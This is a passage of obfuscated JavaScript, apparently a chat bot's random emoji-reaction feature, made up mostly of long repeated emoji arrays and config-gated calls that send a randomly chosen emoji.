🥤','🍣','🍲','🍴','🍽','🍹','🍸','🎂','📱','📺','📻','🎤','📚','💻','📸','📷','❤️','💔','❣️','☀️','🌙','🌃','🏠','🚪',_0x499e06(0x1b9),_0x499e06(0x207),_0x499e06(0x303),'🇦🇺','🇯🇵','🇫🇷',_0x499e06(0x2dd),'👍','👎','👏','👫','👭','👬','👮','🤝','🙏','👑','🌻','🌺','🌸','🌹','🌴','🏞️','🌊','🚗','🚌',_0x499e06(0x2b7),_0x499e06(0x257),_0x499e06(0x22e),'🚣','🛥','🚂','🚁','🚀',_0x499e06(0x2e1),_0x499e06(0x32f),_0x499e06(0x1dd),'🏄♂️','🎾','🏀','🏈','🎯','🏆','??','⬆️','⬇️','⇒','⇐','↩️','↪️','ℹ️','‼️','⁉️','‽️','©️','®️','™️','🔴','🔵','🟢','🔹','🔺','💯','👑','🤣',_0x499e06(0x238),'🤷♀️',_0x499e06(0x1a3),_0x499e06(0x28f),_0x499e06(0x1ad),_0x499e06(0x2e5),_0x499e06(0x1c2),_0x499e06(0x24e),'🏻',_0x499e06(0x250),_0x499e06(0x296),_0x499e06(0x204),'🕴♀️','💇♂️',_0x499e06(0x227),'🚫','🚽',_0x499e06(0x307),'💣','🔫','🕷️','🕸️','💀','👻','🕺','💃',_0x499e06(0x243),'👶','👵','👴','👱','👨','👩','👧','👦','👪','👫','👭','👬','👮',_0x499e06(0x243),'💼','📊','📈','📉','📊','📝','📚','📰','📱','💻','📻','📺','🎬','📽️','📸','📷',_0x499e06(0x1bf),'💡','🔦','�','🏯','🏰','🏠','🏡','🏢','🏣','🏥','🏦','🏧','🏨','🏩','🏪','🏫','🏬','🏭','🏮','🏯','🚣','🛥','🚂','🚁','🚀','🛸','🛹','🚴','🚲','🛺','🚮','🚯','🚱','🚫','🚽',_0x499e06(0x307),'💣','🔫','🕷️',_0x499e06(0x2c4),'💀','👻','🕺','💃',_0x499e06(0x243),'👶','👵','👴','👱','👨','👩','👧','👦','👪','👫','👭','👬','👮','🕴️','💼','📊','📈','📉','📊','📝','📚','📰','📱','💻','📻','📺','🎬',_0x499e06(0x1e6),'📸','📷',_0x499e06(0x1bf),'💡','🔦','🔧','🔨','🔩','🔪','🔫','👑','👑','👸','🤴','👹','🤺','🤻','👺','🤼','🤽','🤾','🤿','🦁','🐴','🦊','🐺','🐼','🐾','🐿','🦄','🦅','🦆','🦇','🦈','🐳','🐋','🐟','🐠','🐡','🐙','🐚','🐜','🐝','🐞',_0x499e06(0x21f),'🦋','🐛','🐌','🐚','🌿','🌸','💐','🌹','🌺','🌻','🌴','🌳','🌲','🌾','🌿','🍃','🍂','🍃','🌻','💐','🌹','🌺','🌸','🌴','🏵','🎀','🏆','🏈','🏉','🎯','🏀','🏊','🏋','🏌','🎲','📚','📖','📜','📝','💭','💬','🗣','💫','🌟','🌠','🎉','🎊','👏','💥','🔥','💥','🌪','💨','🌫','🌬','🌩','🌨','🌧','🌦','🌥','🌡','🌪','🌫','🌬','🌩','🌨','🌧','🌦','🌥','🌡','🌪','🌫','🌬','🌩','🌨','🌧','🌦','🌥','🌡','🌱','🌿','🍃','🍂','🌻','💐','🌹','🌺','🌸','🌴','🏵','🎀','🏆','🏈','🏉','🎯','🏀','🏊','🏋','🏌','🎲','📚','📖','📜','📝','💭','💬','🗣','💫','🌟','🌠','🎉','🎊','👏','💥','🔥','💥','🌪','💨','🌫','🌬','🌩','🌨','🌧','🌦','🌥','🌡','🌪','🌫','🌬','🌩','🌨','🌧','🌦','🌥','🌡','🕯️','💡','🔦','🔧','🔨','🔩','🔪','🔫','👑','👸','🤴','👹','🤺','🤻','👺','🤼','🤽','🤾','🤿','🦁','🐴','🦊','🐺','🐼','🐾','🐿','🦄','🦅','🦆','🦇','🦈','🐳','🐋','🐟','🐠','🐡','🐙','🐚','🐜','🐝','🐞','🕷️','🦋','🐛','🐌','🐚','🌿','🌸','💐','🌹','🌺','🌻','🌴','🏵','🏰','🏠','🏡','🏢','🏣','🏥','🏦','🏧','🏨','🏩','🏪','🏫','🏬','🏭','🏮','🏯','🚣','🛥','🚂','🚁','🚀','🛸','🛹','🚴','🚲','🛺','🚮','🚯','🚱','🚫','🚽',_0x499e06(0x307),'💣','🔫',_0x499e06(0x21f),_0x499e06(0x2c4),'💀','👻','🕺','💃',_0x499e06(0x243),'👶','👵','👴','👱','👨','👩','👧','👦','👪','👫','👭','👬','👮',_0x499e06(0x243),'💼','📊','📈','📉','📊','📝','📚','📰','📱','💻','📻','📺','🎬','📽️','📸','📷',_0x499e06(0x1bf),'💡','🔦','🔧','🔨','🔩','🔪','🔫','👑','👸','🤴','👹','🤺','🤻','👺','🤼','🤽','🤾','🤿','🦁','🐴','🦊','🐺','🐼','🐾','🐿','🦄','🦅','🦆','🦇','🦈','🐳','🐋','🐟','🐠','🐡','🐙','🐚','🐜','🐝','🐞',_0x499e06(0x21f),'🦋','🐛','🐌','🐚','🌿','🌸','💐','🌹','🌺','🌻','🌴','🏵','🏰','🐒','🦍','🦧','🐶','🐕','🦮','🐕🦺','🐩','🐺','🦊','🦝','🐱','🐈',_0x499e06(0x279),'🦁','🐯','🐅','🐆','🐴','🐎','🦄','🦓','🦌','🦬','🐮','🐂','🐃','🐄','🐷','🐖','🐗','🐽','🐏','🐑','🐐','🐪','🐫','🦙','🦒','🐘','🦣','🦏','🦛','🐭','🐁','🐀','🐹','🐰','🐇','🐿️','🦫','🦔','🦇','🐻',_0x499e06(0x214),'🐨','🐼','🦥','🦦','🦨','🦘','🦡','🐾','🦃','🐔','🐓','🐣','🐤','🐥','🐦','🐧',_0x499e06(0x1e1),'🦅','🦆','🦢','🦉','🦤','🪶','🦩','🦚','🦜','🐸','🐊','🐢','🦎','🐍','🐲','🐉','🦕','🦖','🐳','🐋','🐬','🦭','🐟','🐠','😀','😃','😄','😁','😆','😅','🤣','😂','🙂','🙃','😉','😊','😇','🥰','😍','🤩','😘','😗','☺️','😚','😙','🥲','😋','😛','😜','🤪','😝','🤑','🤗','🤭','🤫','🤔','🤐','🤨','😐','😑','😶',_0x499e06(0x278),'😏','😒','🙄','😬',_0x499e06(0x1b2),'🤥','😌','😔','😪','🤤','😴','😷','🤒','🤕','🤢','🤮','🤧','🥵','🥶','🥴','😵','😵💫','🤯','🤠','🥳','🥸','😎','🤓','🧐','😕','😟','🙁','☹️','😮','😯','😲','😳','🥺','😦','😧','😨','😰','😥','😢','😭','😱','😖','😣','😞','😓','😩','😫','🥱','😤','😡','😠','🤬','😈','👿','💀','☠️','💩','🤡','👹','👺','👻','👽','👾','🤖','😺','😸','😹','😻','😼','😽','🙀','😿','😾','🙈','🙉','🙊','💋','💌','💘','💝','💖','💗','💓','💞','💕','💟','❣️','💔',_0x499e06(0x2a4),'❤️🩹','❤️','🧡','💛','💚','💙','💜','🤎','🖤','🤍','💯','💢','💥','💫','💦','💨',_0x499e06(0x307),'💣','💬',_0x499e06(0x19f),'🗨️',_0x499e06(0x269),'💭','💤','👋','🤚',_0x499e06(0x220),'✋','🖖','👌','🤌','🤏','✌️','🤞','🤟','🤘','🤙','👈','👉','👆','🖕','👇','☝️','👍','👎','✊','👊','🤛','🤜','👏','🙌','👐','🤲','🤝','🙏','✍️','💅','🤳','💪','🦾','🦿','🦵','🦶','👂','🦻','👃','🧠','🫀','🫁','🦷','🦴','👀','👁️','👅','👄','👶','🧒','👦','👧','🧑','👱','👨','🧔',_0x499e06(0x323),_0x499e06(0x1b7),_0x499e06(0x29e),_0x499e06(0x27c),_0x499e06(0x19a),'👨🦲','👩','👩🦰',_0x499e06(0x330),_0x499e06(0x276),_0x499e06(0x1ed),_0x499e06(0x32c),_0x499e06(0x230),_0x499e06(0x2b6),'🧑🦲',_0x499e06(0x2d9),_0x499e06(0x25a),'🧓','👴','👵','🙍',_0x499e06(0x1cc),_0x499e06(0x1cf),'🙎',_0x499e06(0x258),_0x499e06(0x256),'🙅','🙅♂️',_0x499e06(0x28f),'🙆','🙆♂️',_0x499e06(0x2e5),'💁',_0x499e06(0x2a9),_0x499e06(0x23d),'🙋',_0x499e06(0x1e3),_0x499e06(0x28e),'🧏',_0x499e06(0x236),_0x499e06(0x297),'🙇',_0x499e06(0x326),_0x499e06(0x1f4),'🤦',_0x499e06(0x1c2),_0x499e06(0x24e),'🤷','🤷♂️',_0x499e06(0x2a2),_0x499e06(0x277),_0x499e06(0x287),_0x499e06(0x308),'🧑🎓',_0x499e06(0x32e),_0x499e06(0x1de),'🧑🏫','👨🏫',_0x499e06(0x2e8),_0x499e06(0x1a1),'👨⚖️','👩⚖️','🧑🌾','👨🌾','👩🌾',_0x499e06(0x2b9),_0x499e06(0x30d),_0x499e06(0x294),_0x499e06(0x202),_0x499e06(0x331),_0x499e06(0x25b),_0x499e06(0x248),'👨🏭','👩🏭',_0x499e06(0x18e),_0x499e06(0x31c),'👩💼',_0x499e06(0x222),_0x499e06(0x2f7),'👩🔬',_0x499e06(0x1e2),_0x499e06(0x199),_0x499e06(0x1ce),_0x499e06(0x247),'👨🎤',_0x499e06(0x1a0),_0x499e06(0x201),_0x499e06(0x22c),'👩🎨',_0x499e06(0x192),_0x499e06(0x2ad),_0x499e06(0x1ae),_0x499e06(0x1a7),_0x499e06(0x1c1),_0x499e06(0x1bc),_0x499e06(0x1e8),_0x499e06(0x26a),_0x499e06(0x282),'👮',_0x499e06(0x24a),_0x499e06(0x1b5),_0x499e06(0x320),'🕵️♂️',_0x499e06(0x288),'💂',_0x499e06(0x1c3),'💂♀️','🥷','👷',_0x499e06(0x2a7),_0x499e06(0x290),'🤴','👸','👳',_0x499e06(0x327),'👳♀️','👲','🧕','🤵','🤵♂️',_0x499e06(0x312),'👰',_0x499e06(0x31d),_0x499e06(0x22d),'🤰','🤱',_0x499e06(0x26d),_0x499e06(0x283),_0x499e06(0x31e),'👼','🎅','🤶',_0x499e06(0x1ef),'🦸',_0x499e06(0x2c6),_0x499e06(0x2f2),'🦹','🦹♂️','🦹♀️','🧙','🧙♂️','🧙♀️','🧚','🧚♂️',_0x499e06(0x1c7),'🧛',_0x499e06(0x300),_0x499e06(0x23c),'🧜',_0x499e06(0x221),_0x499e06(0x1cd),'🧝',_0x499e06(0x233),_0x499e06(0x211),'🧞',_0x499e06(0x2bc),'🧞♀️','🧟','🧟♂️',_0x499e06(0x205),'💆','💆♂️',_0x499e06(0x296),'💇',_0x499e06(0x2da),_0x499e06(0x227),'🚶','🚶♂️',_0x499e06(0x2bf),'🧍',_0x499e06(0x1e7),_0x499e06(0x2f5),'🧎',_0x499e06(0x305),'🧎♀️','🧑🦯','👨🦯',_0x499e06(0x1ec),_0x499e06(0x306),_0x499e06(0x21c),'👩🦼','🧑🦽',_0x499e06(0x29a),_0x499e06(0x1eb),'🏃',_0x499e06(0x2e1),'🏃♀️','💃','🕺',_0x499e06(0x243),'👯','👯♂️',_0x499e06(0x30e),'🧖',_0x499e06(0x274),_0x499e06(0x2ba),'🧗',_0x499e06(0x1b0),'🧗♀️','🤺','🏇','⛷️','🏂','🏌️',_0x499e06(0x2cc),'🏌️♀️','🏄',_0x499e06(0x2a1),_0x499e06(0x32a),'🚣','🚣♂️',_0x499e06(0x2d4),'🏊',_0x499e06(0x1dd),_0x499e06(0x229),'⛹️',_0x499e06(0x223),_0x499e06(0x281),_0x499e06(0x19c),_0x499e06(0x20f),_0x499e06(0x32f),'🚴',_0x499e06(0x18b),_0x499e06(0x324),'🚵',_0x499e06(0x1e5),_0x499e06(0x1d7),'🤸','🤸♂️',_0x499e06(0x196),'🤼',_0x499e06(0x2b1),'🤼♀️','🤽',_0x499e06(0x27d),_0x499e06(0x2d5),'🤾',_0x499e06(0x193),_0x499e06(0x1b8),'🤹',_0x499e06(0x292),_0x499e06(0x1e0),'🧘',_0x499e06(0x31b),_0x499e06(0x1a5),'🛀','🛌','🧑🤝🧑','👭','👫','👬','💏','👩❤️💋👨',_0x499e06(0x237),_0x499e06(0x1f3),'💑',_0x499e06(0x1ba),'👨❤️👨',_0x499e06(0x2ef),'👪',_0x499e06(0x2d3),_0x499e06(0x1bb),_0x499e06(0x18c),_0x499e06(0x2c9),_0x499e06(0x31f),'👨👨👦',_0x499e06(0x2f8),_0x499e06(0x285),_0x499e06(0x1ca),_0x499e06(0x2dc),_0x499e06(0x234),_0x499e06(0x1d2),_0x499e06(0x270),_0x499e06(0x1aa),_0x499e06(0x1bd),_0x499e06(0x1ab),_0x499e06(0x284),'👨👧',_0x499e06(0x2e9),_0x499e06(0x1d9),_0x499e06(0x291),_0x499e06(0x255),_0x499e06(0x21e),_0x499e06(0x190),_0x499e06(0x1df),_0x499e06(0x188),'👤','👥','🫂','👣','🦰','🦱','🦳','🦲','🐵'],_0x554077=_0x58e878[Math[_0x499e06(0x2d7)](Math['random']()*_0x58e878[_0x499e06(0x27a)])];_0x320a0c[_0x499e06(0x2e2)](_0x554077);}}if(!_0x3fa766&&_0x284337===_0x53b970){if(config[_0x499e06(0x28c)]==='true'){const _0x3d78ea=['😊','👍','😂','💯','🔥','🙏','🎉','👏','😎','🤖','👫','👭','👬','👮',_0x499e06(0x243),'💼','📊','📈','📉','📊','📝','📚','📰','📱','💻','📻','📺','🎬',_0x499e06(0x1e6),'📸','📷',_0x499e06(0x1bf),'💡','🔦','🔧','🔨','🔩','🔪','🔫','👑','👸','🤴','👹','🤺','🤻','👺','🤼','🤽','🤾','🤿','🦁','🐴','🦊','🐺','🐼','🐾','🐿','🦄','🦅','🦆','🦇','🦈','🐳','🐋','🐟','🐠','🐡','🐙','🐚','🐜','🐝','🐞',_0x499e06(0x21f),'🦋','🐛','🐌','🐚','🌿','🌸','💐','🌹','🌺','🌻','🌴','🏵','🏰','🏠','🏡','🏢','🏣','🏥','🏦','🏧','🏨','🏩','🏪','🏫','🏬','🏭','🏮','🏯','🚣','🛥','🚂','🚁','🚀','🛸','🛹','🚴','🚲','🛺','🚮','🚯','🚱','🚫','🚽','🕳️','💣','🔫',_0x499e06(0x21f),_0x499e06(0x2c4),'💀','👻','🕺','💃',_0x499e06(0x243),'👶','👵','👴','👱','👨','👩','👧','👦','👪','👫','👭','👬','👮','🕴️','💼','📊','📈','📉','📊','📝','📚','📰','📱','💻','📻','📺','🎬','📽️','📸','📷',_0x499e06(0x1bf),'💡','🔦','🔧','🔨','🔩','🔪','🔫','👑','👸','🤴','👹','🤺','🤻','👺','🤼','🤽','🤾','🤿','🦁','🐴','🦊','🐺','🐼','🐾','🐿','🦄','🦅','🦆','🦇','🦈','🐳','🐋','🐟','🐠','🐡','🐙','🐚','🐜','🐝','🐞',_0x499e06(0x21f),'🦋','🐛','🐌','🐚','🌿','🌸','💐','🌹','🌺','🌻','🌴','🏵','🏰','🏠','🏡','🏢','🏠','🏡','🏢','🏣','🏥','🏦','🏧','🏨','🏩','🏪','🏫','🏬','🏭','🏮','🏯','🚣','🛥','🚂','🚁','🚀','🛸','🛹','🚴','🚲','🛺','🚮','🚯','🚱','🚫','🚽',_0x499e06(0x307),'💣','🔫',_0x499e06(0x21f),_0x499e06(0x2c4),'💀','👻','🕺','💃',_0x499e06(0x243),'👶','👵','👴','👱','👨','👩','👧','👦','👪','👫','👭','👬','👮','🕴️','💼','📊','📈','📉','📊','📝','📚','📰','📱','💻','📻','📺','🎬','📽️','📸','📷','🕯️','💡','🔦','🔧','🔨','🔩','🔪','🔫','👑','👸','🤴','👹','🤺','🤻','👺','🤼','🤽','🤾','🤿','🦁','🐴','🦊','🐺','🐼','🐾','🐿','🦄','🦅','🦆','🦇','🦈','🐳','🐋','🐟','🐠','🐡','🐙','🐚','🐜','🐝','🐞',_0x499e06(0x21f),'🦋','🐛','🐌','🐚','🌿','🌸','💐','🌹','🌺','🌻','🌴','🏵','🏰','🏠','🏡','🏢','🏣','🏥','🏦','🏧','🏨','🏩','🏪','🏫','🏬','🏭','🏮','🏯','🚣','🛥','🚂','🚁','🚀','🛸','🛹','🚴','🚲','🛺','🚮','🚯','🚱','🚫','🚽',_0x499e06(0x307),'💣','🔫',_0x499e06(0x21f),_0x499e06(0x2c4),'💀','👻','🕺','💃','🕴️','👶','👵','👴','👱','👨','👩','👧','👦','👪','🙂','😑','🤣','😍','😘','😗','😙','😚','😛','😝','😞','😟','😠','😡','😢','😭','😓','😳','😴','😌','😆','😂','🤔','😒','😓','😶','🙄','🐶','🐱','🐔','🐷','🐴','🐲','🐸','🐳','🐋','🐒','🐑','🐕','🐩','🍔','🍕','🥤','🍣','🍲','🍴','🍽','🍹','🍸','🎂','📱','📺','📻','🎤','📚','💻','📸','📷','❤️','💔','❣️','☀️','🌙','🌃','🏠','🚪',_0x499e06(0x1b9),_0x499e06(0x207),'🇨🇦',_0x499e06(0x286),_0x499e06(0x194),_0x499e06(0x2cd),'🇪🇸','👍','👎','👏','👫','👭','👬','👮','🤝','🙏','👑','🌻','🌺','🌸','🌹','🌴','🏞️','🌊','🚗','🚌',_0x499e06(0x2b7),'🛫️','🛬️','🚣','🛥','🚂','🚁','🚀',_0x499e06(0x2e1),_0x499e06(0x32f),_0x499e06(0x1dd),'🏄♂️','🎾','🏀','🏈','🎯','🏆','??','⬆️','⬇️','⇒','⇐','↩️','↪️','ℹ️','‼️','⁉️','‽️','©️','®️','™️','🔴','🔵','🟢','🔹','🔺','💯','👑','🤣',_0x499e06(0x238),_0x499e06(0x2a2),_0x499e06(0x1a3),'🙅♀️','🙆♂️','🙆♀️',_0x499e06(0x1c2),_0x499e06(0x24e),'🏻',_0x499e06(0x250),_0x499e06(0x296),_0x499e06(0x204),_0x499e06(0x2fa),'💇♂️',_0x499e06(0x227),'🚫','🚽','🕳️','💣','🔫',_0x499e06(0x21f),_0x499e06(0x2c4),'💀','👻','🕺','💃',_0x499e06(0x243),'👶','👵','👴','👱','👨','👩','👧','👦','👪','👫','👭','👬','👮','🕴️','💼','📊','📈','📉','📊','📝','📚','📰','📱','💻','📻','📺','🎬',_0x499e06(0x1e6),'📸','📷','🕯️','💡','🔦','�','🏯','🏰','🏠','🏡','🏢','🏣','🏥','🏦','🏧','🏨','🏩','🏪','🏫','🏬','🏭','🏮','🏯','🚣','🛥','🚂','🚁','🚀','🛸','🛹','🚴','🚲','🛺','🚮','🚯','🚱','🚫','🚽',_0x499e06(0x307),'💣','🔫',_0x499e06(0x21f),_0x499e06(0x2c4),'💀','👻','🕺','💃',_0x499e06(0x243),'👶','👵','👴','👱','👨','👩','👧','👦','👪','👫','👭','👬','👮','🕴️','💼','📊','📈','📉','📊','📝','📚','📰','📱','💻','📻','📺','🎬',_0x499e06(0x1e6),'📸','📷',_0x499e06(0x1bf),'💡','🔦','🔧','🔨','🔩','🔪','🔫','👑','👑','👸','🤴','👹','🤺','🤻','👺','🤼','🤽','🤾','🤿','🦁','🐴','🦊','🐺','🐼','🐾','🐿','🦄','🦅','🦆','🦇','🦈','🐳','🐋','🐟','🐠','🐡','🐙','🐚','🐜','🐝','🐞',_0x499e06(0x21f),'🦋','🐛','🐌','🐚','🌿','🌸','💐','🌹','🌺','🌻','🌴','🌳','🌲','🌾','🌿','🍃','🍂','🍃','🌻','💐','🌹','🌺','🌸','🌴','🏵','🎀','🏆','🏈','🏉','🎯','🏀','🏊','🏋','🏌','🎲','📚','📖','📜','📝','💭','💬','🗣','💫','🌟','🌠','🎉','🎊','👏','💥','🔥','💥','🌪','💨','🌫','🌬','🌩','🌨','🌧','🌦','🌥','🌡','🌪','🌫','🌬','🌩','🌨','🌧','🌦','🌥','🌡','🌪','🌫','🌬','🌩','🌨','🌧','🌦','🌥','🌡','🌱','🌿','🍃','🍂','🌻','💐','🌹','🌺','🌸','🌴','🏵','🎀','🏆','🏈','🏉','🎯','🏀','🏊','🏋','🏌','🎲','📚','📖','📜','📝','💭','💬','🗣','💫','🌟','🌠','🎉','🎊','👏','💥','🔥','💥','🌪','💨','🌫','🌬','🌩','🌨','🌧','🌦','🌥','🌡','🌪','🌫','🌬','🌩','🌨','🌧','🌦','🌥','🌡',_0x499e06(0x1bf),'💡','🔦','🔧','🔨','🔩','🔪','🔫','👑','👸','🤴','👹','🤺','🤻','👺','🤼','🤽','🤾','🤿','🦁','🐴','🦊','🐺','🐼','🐾','🐿','🦄','🦅','🦆','🦇','🦈','🐳','🐋','🐟','🐠','🐡','🐙','🐚','🐜','🐝','🐞',_0x499e06(0x21f),'🦋','🐛','🐌','🐚','🌿','🌸','💐','🌹','🌺','🌻','🌴','🏵','🏰','🏠','🏡','🏢','🏣','🏥','🏦','🏧','🏨','🏩','🏪','🏫','🏬','🏭','🏮','🏯','🚣','🛥','🚂','🚁','🚀','🛸','🛹','🚴','🚲','🛺','🚮','🚯','🚱','🚫','🚽','🕳️','💣','🔫','🕷️',_0x499e06(0x2c4),'💀','👻','🕺','💃',_0x499e06(0x243),'👶','👵','👴','👱','👨','👩','👧','👦','👪','👫','👭','👬','👮',_0x499e06(0x243),'💼','📊','📈','📉','📊','📝','📚','📰','📱','💻','📻','📺','🎬','📽️','📸','📷','🕯️','💡','🔦','🔧','🔨','🔩','🔪','🔫','👑','👸','🤴','👹','🤺','🤻','👺','🤼','🤽','🤾','🤿','🦁','🐴','🦊','🐺','🐼','🐾','🐿','🦄','🦅','🦆','🦇','🦈','🐳','🐋','🐟','🐠','🐡','🐙','🐚','🐜','🐝','🐞',_0x499e06(0x21f),'🦋','🐛','🐌','🐚','🌿','🌸','💐','🌹','🌺','🌻','🌴','🏵','🏰','🐒','🦍','🦧','🐶','🐕','🦮',_0x499e06(0x197),'🐩','🐺','🦊','🦝','🐱','🐈',_0x499e06(0x279),'🦁','🐯','🐅','🐆','🐴','🐎','🦄','🦓','🦌','🦬','🐮','🐂','🐃','🐄','🐷','🐖','🐗','🐽','🐏','🐑','🐐','🐪','🐫','🦙','🦒','🐘','🦣','🦏','🦛','🐭','🐁','🐀','🐹','🐰','🐇',_0x499e06(0x329),'🦫','🦔','🦇','🐻','🐻❄️','🐨','🐼','🦥','🦦','🦨','🦘','🦡','🐾','🦃','🐔','🐓','🐣','🐤','🐥','🐦','🐧',_0x499e06(0x1e1),'🦅','🦆','🦢','🦉','🦤','🪶','🦩','🦚','🦜','🐸','🐊','🐢','🦎','🐍','🐲','🐉','🦕','🦖','🐳','🐋','🐬','🦭','🐟','🐠','😀','😃','😄','😁','😆','😅','🤣','😂','🙂','🙃','😉','😊','😇','🥰','😍','🤩','😘','😗','☺️','😚','😙','🥲','😋','😛','😜','🤪','😝','🤑','🤗','🤭','🤫','🤔','🤐','🤨','😐','😑','😶',_0x499e06(0x278),'😏','😒','🙄','😬',_0x499e06(0x1b2),'🤥','😌','😔','😪','🤤','😴','😷','🤒','��','🤢','🤮','🤧','🥵','🥶','🥴','😵',_0x499e06(0x1ee),'🤯','🤠','🥳','🥸','😎','🤓','🧐','😕','😟','🙁','☹️','😮','😯','😲','😳','🥺','😦','😧','😨','😰','😥','😢','😭','😱','😖','😣','😞','😓','😩','😫','🥱','😤','😡','😠','🤬','😈','👿','💀','☠️','💩','🤡','👹','👺','👻','👽','👾','🤖','😺','😸','😹','😻','😼','😽','🙀','😿','😾','🙈','🙉','🙊','💋','💌','💘','💝','💖','💗','💓','💞','💕','💟','❣️','💔',_0x499e06(0x2a4),_0x499e06(0x24b),'❤️','🧡','💛','💚','💙','💜','🤎','🖤','🤍','💯','💢','💥','💫','💦','💨','🕳️','💣','💬','👁️🗨️',_0x499e06(0x2c8),_0x499e06(0x269),'💭','💤','👋','🤚',_0x499e06(0x220),'✋','🖖','👌','🤌','🤏','✌️','🤞','🤟','🤘','🤙','👈','👉','👆','🖕','👇','☝️','👍','👎','✊','👊','🤛','🤜','👏','🙌','👐','🤲','🤝','🙏','✍️','💅','🤳','💪','🦾','🦿','🦵','🦶','👂','🦻','👃','🧠','🫀','🫁','🦷','🦴','👀','👁️','👅','👄','👶','🧒','👦','👧','🧑','👱','👨','🧔',_0x499e06(0x323),_0x499e06(0x1b7),_0x499e06(0x29e),_0x499e06(0x27c),_0x499e06(0x19a),_0x499e06(0x224),'👩',_0x499e06(0x23e),'🧑🦰',_0x499e06(0x276),_0x499e06(0x1ed),_0x499e06(0x32c),_0x499e06(0x230),_0x499e06(0x2b6),'🧑🦲',_0x499e06(0x2d9),_0x499e06(0x25a),'🧓','👴','👵','🙍','🙍♂️',_0x499e06(0x1cf),'🙎',_0x499e06(0x258),_0x499e06(0x256),'🙅',_0x499e06(0x1a3),_0x499e06(0x28f),'🙆',_0x499e06(0x1ad),_0x499e06(0x2e5),'💁',_0x499e06(0x2a9),_0x499e06(0x23d),'🙋',_0x499e06(0x1e3),_0x499e06(0x28e),'🧏',_0x499e06(0x236),'🧏♀️','🙇',_0x499e06(0x326),_0x499e06(0x1f4),'🤦',_0x499e06(0x1c2),_0x499e06(0x24e),'🤷',_0x499e06(0x238),_0x499e06(0x2a2),_0x499e06(0x277),_0x499e06(0x287),_0x499e06(0x308),'🧑🎓','👨🎓',_0x499e06(0x1de),_0x499e06(0x29c),_0x499e06(0x219),_0x499e06(0x2e8),_0x499e06(0x1a1),'👨⚖️',_0x499e06(0x2f6),_0x499e06(0x2ed),_0x499e06(0x21d),_0x499e06(0x2b4),_0x499e06(0x2b9),_0x499e06(0x30d),_0x499e06(0x294),'🧑🔧',_0x499e06(0x331),_0x499e06(0x25b),_0x499e06(0x248),_0x499e06(0x315),_0x499e06(0x2aa),'🧑💼',_0x499e06(0x31c),_0x499e06(0x1e4),'🧑🔬',_0x499e06(0x2f7),_0x499e06(0x314),_0x499e06(0x1e2),_0x499e06(0x199),_0x499e06(0x1ce),_0x499e06(0x247),'👨🎤','👩🎤','🧑🎨','👨🎨',_0x499e06(0x1d3),'🧑✈️',_0x499e06(0x2ad),_0x499e06(0x1ae),_0x499e06(0x1a7),'👨🚀',_0x499e06(0x1bc),_0x499e06(0x1e8),'👨🚒',_0x499e06(0x282),'👮',_0x499e06(0x24a),_0x499e06(0x1b5),_0x499e06(0x320),_0x499e06(0x2de),_0x499e06(0x288),'💂',_0x499e06(0x1c3),_0x499e06(0x217),'🥷','👷',_0x499e06(0x2a7),_0x499e06(0x290),'🤴','👸','👳',_0x499e06(0x327),'👳♀️','👲','🧕','🤵',_0x499e06(0x1f8),_0x499e06(0x312),'👰',_0x499e06(0x31d),'👰♀️','🤰','🤱',_0x499e06(0x26d),_0x499e06(0x283),'🧑🍼','👼','🎅','🤶','🧑🎄','🦸',_0x499e06(0x2c6),_0x499e06(0x2f2),'🦹',_0x499e06(0x20e),_0x499e06(0x1af),'🧙',_0x499e06(0x1f9),_0x499e06(0x24f),'🧚',_0x499e06(0x246),_0x499e06(0x1c7),'🧛',_0x499e06(0x300),'🧛♀️','🧜',_0x499e06(0x221),_0x499e06(0x1cd),'🧝',_0x499e06(0x233),_0x499e06(0x211),'🧞','🧞♂️',_0x499e06(0x2a5),'🧟','🧟♂️',_0x499e06(0x205),'💆',_0x499e06(0x250),_0x499e06(0x296),'💇',_0x499e06(0x2da),'💇♀️','🚶',_0x499e06(0x2ae),_0x499e06(0x2bf),'🧍',_0x499e06(0x1e7),_0x499e06(0x2f5),'🧎',_0x499e06(0x305),_0x499e06(0x309),_0x499e06(0x2f3),'👨🦯',_0x499e06(0x1ec),_0x499e06(0x306),_0x499e06(0x21c),_0x499e06(0x1c9),_0x499e06(0x319),_0x499e06(0x29a),_0x499e06(0x1eb),'🏃',_0x499e06(0x2e1),'🏃♀️','💃','🕺',_0x499e06(0x243),'👯',_0x499e06(0x1a9),_0x499e06(0x30e),'🧖','🧖♂️',_0x499e06(0x2ba),'🧗',_0x499e06(0x1b0),_0x499e06(0x2ca),'🤺','🏇','⛷️','🏂',_0x499e06(0x1a2),_0x499e06(0x2cc),_0x499e06(0x228),'🏄',_0x499e06(0x2a1),_0x499e06(0x32a),'🚣',_0x499e06(0x302),'🚣♀️','🏊',_0x499e06(0x1dd),'🏊♀️','⛹️',_0x499e06(0x223),'⛹️♀️',_0x499e06(0x19c),_0x499e06(0x20f),_0x499e06(0x32f),'🚴',_0x499e06(0x18b),_0x499e06(0x324),'🚵','🚵♂️',_0x499e06(0x1d7),'🤸',_0x499e06(0x187),_0x499e06(0x196),'🤼',_0x499e06(0x2b1),_0x499e06(0x2a3),'🤽',_0x499e06(0x27d),_0x499e06(0x2d5),'🤾','🤾♂️',_0x499e06(0x1b8),'🤹',_0x499e06(0x292),_0x499e06(0x1e0),'🧘',_0x499e06(0x31b),_0x499e06(0x1a5),'🛀','🛌',_0x499e06(0x2ab),'👭','👫','👬','💏','👩❤️💋👨','👨❤️💋👨',_0x499e06(0x1f3),'💑',_0x499e06(0x1ba),'👨❤️👨',_0x499e06(0x2ef),'👪',_0x499e06(0x2d3),_0x499e06(0x1bb),_0x499e06(0x18c),'👨👩👦👦',_0x499e06(0x31f),'👨👨👦',_0x499e06(0x2f8),_0x499e06(0x285),_0x499e06(0x1ca),_0x499e06(0x2dc),_0x499e06(0x234),'👩👩👧',_0x499e06(0x270),_0x499e06(0x1aa),_0x499e06(0x1bd),_0x499e06(0x1ab),'👨👦👦',_0x499e06(0x2d0),_0x499e06(0x2e9),_0x499e06(0x1d9),_0x499e06(0x291),'👩👦👦',_0x499e06(0x21e),_0x499e06(0x190),_0x499e06(0x1df),_0x499e06(0x188),'👤','👥','🫂','👣','🦰','🦱','🦳','🦲','🐵'],_0x100218=_0x3d78ea[Math['floor'](Math['random']()*_0x3d78ea[_0x499e06(0x27a)])];_0x320a0c[_0x499e06(0x2e2)](_0x100218);}}if(!_0x3fa766&&_0x284337!==_0x53b970){if(config[_0x499e06(0x2e3)]===_0x499e06(0x1b6)){const 